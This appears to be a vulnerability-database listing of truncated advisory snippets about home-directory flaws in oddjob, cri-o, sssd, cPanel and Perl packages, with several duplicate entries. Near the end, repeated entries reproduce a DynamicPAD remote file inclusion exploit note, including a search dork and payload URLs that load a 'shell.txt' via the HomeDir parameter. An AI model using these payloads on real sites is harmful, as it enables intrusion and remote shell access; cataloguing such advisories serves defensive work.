Astra Linux - уязвимость в oddjob

A race condition was identified in the mkhomedir tool included with the oddjob package in versions prior to 0.34.5 and 0.34.6. During the home creation process, mkhomedir copies the /etc/skel directory into the newly created home directory and changes its ownership to the home’s user, without...

EUVD-2007-2520

Malware in sbrugna...

Privilege Escalation

github.com/cri-o/cri-o is vulnerable to Privilege Escalation. The vulnerability exists because the setupContainerUser function in containercreate.go does not properly validate the homedir parameter, allowing an attacker to maliciously craft an environment variable with newlines to add entries to ...

new packages: perl-File-HomeDir

An update is available for perl-File-HomeDir. This update affects Rocky Linux 9. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list For detailed information on changes in this release, see the Rocky...

oddjob: race condition in oddjob_selinux_mkdir function in mkhomedir.c can lead to symlink attack

A race condition was found in the mkhomedir tool shipped with the oddjob package. During the home creation, mkhomedir copies the /etc/skel directory into the newly created home and changes its ownership to the home's user without properly checking the homedir path. This flaw allows an attacker to...

new module: perl:5.30

An update is available for perl-Pod-Perldoc, perl-DBI, perl-Pod-Escapes, perl-Devel-PPPort, perl-Pod-Usage, perl-Sub-Exporter, perl-perlfaq, perl-Object-HashBase, perl-CPAN-Meta-YAML, perl-Digest, perl-podlators, perl-bignum, perl-Text-ParseWords, perl-Text-Template, perl-DBD-MySQL, perl-Text-Glo...

CVE-2016-10776

cPanel before 60.0.25 allows stored XSS during the homedir removal phase of WHM Account termination SEC-174...

CVE-2016-10776

cPanel before 60.0.25 allows stored XSS during the homedir removal phase of WHM Account termination SEC-174...

Cross site scripting

cPanel before 60.0.25 allows stored XSS during the homedir removal phase of WHM Account termination SEC-174...

CVE-2016-10776

CVE-2016-10776 affects cPanel before 60.0.25, enabling stored XSS during the homedir removal phase of WHM Account termination (SEC-174). Root cause is improper handling/validation of user-supplied data in the web interface during account termination, allowing injected scripts to be stored and pot...

sssd: fallback_homedir returns '/' for empty home directories in passwd file

A vulnerability was found in sssd where, if a user was configured with no home directory set, sssd would return '/' the root directory instead of '' the empty string / no home directory. This could impact services that restrict the user's filesystem access to within their home directory through...

SUSE-SU-2019:0556-1 Security update for sssd

This update for sssd fixes the following issues: Security vulnerabilities addressed: - Fix fallbackhomedir returning '/' for empty home directories CVE-2019-3811 bsc1121759 - Create sockets with right permissions bsc1098377, CVE-2018-10852 Other bug fixes and changes: - Install logrotate...

DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities

No description provided by source. DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : Powered By DynamicPAD Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt? Discover...

DynamicPAD &lt;= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities

No description provided by source. DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt?...

dynamicpad-rfi.txt

DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt? Discovered by : ThE TiGeR...

DynamicPAD 1.02.18 - HomeDir Remote File Inclusion

DynamicPAD 1.02.18 - HomeDir Remote File Inclusion DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir=...

DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ===================================================================== DynamicPAD = 1.02.18 HomeDir Remote File Inclusion Vulnerabilities ===================================================================== DynamicPAD Remote file inclusion...

DynamicPAD 1.02.18 - &#039;HomeDir&#039; Remote File Inclusion

DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt? Discovered by : ThE TiGeR...